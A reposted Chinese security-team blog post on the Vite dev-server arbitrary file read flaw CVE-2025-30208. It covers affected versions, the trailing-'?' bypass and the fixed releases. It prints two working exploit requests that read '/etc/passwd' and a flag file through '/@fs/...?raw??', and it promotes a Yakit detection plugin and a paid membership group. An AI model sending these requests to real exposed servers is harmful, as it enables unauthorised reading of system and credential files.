扫码加团队公开群
备注"加群"
Vite 是一个前端开发工具的提供商,在版本 6.2.3 之前的版本(包括 6.1.2、6.0.12、5.4.15和 4.5.10)存在漏洞。
此绕过漏洞存在于多个地方移除了尾随分隔符(如`?`),但未在查询字符串正则表达式中进行处理。任意文件的内容可以被返回到浏览器。只有那些显式将 Vite 开发服务器暴露在网络中的应用程序(使用 `--host` 或 `server.host` 配置选项)才会受到影响。
版本 6.2.3、6.1.2、6.0.12、5.4.15 和 4.5.10 已修复此问题。
既然环境都有了,那就复现一下
GET /@fs/C:/flag.txt?import&raw?? HTTP/1.1
Host: 192.168.52.1:9000
GET /@fs/etc/passwd?raw?? HTTP/1.1
Host: 192.168.172.129:5173
写个漏洞检测插件,再发包观察一下其他存在漏洞的响应情况
把如上两种情况也加进漏洞存在的判断条件中
插件ID: 7d5eeffa-b1ca-4062-aa17-b807bddb6b19
内部圈子介绍
内部圈子专栏介绍
Freebuf知识大陆内部共享资料截屏详情如下
(每周保持更新)
知识大陆——安全渗透感知大家族
圈子券后现价 ¥49.9元
如果你有兴趣加入,抓住机会不要犹豫,价格只会上涨,不会下跌
圈子人数少于400人 49.9元/年
圈子人数少于600人 69.9元/年
(新人优惠券10,扫码或者私信开头二维码即可领取)
END
关注Code4th安全团队
了解更多网络安全内容~
原文始发于微信公众号(C4安全团队):[漏洞热点+yakit插件] Vite任意文件读取漏洞(CVE-2025-30208)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论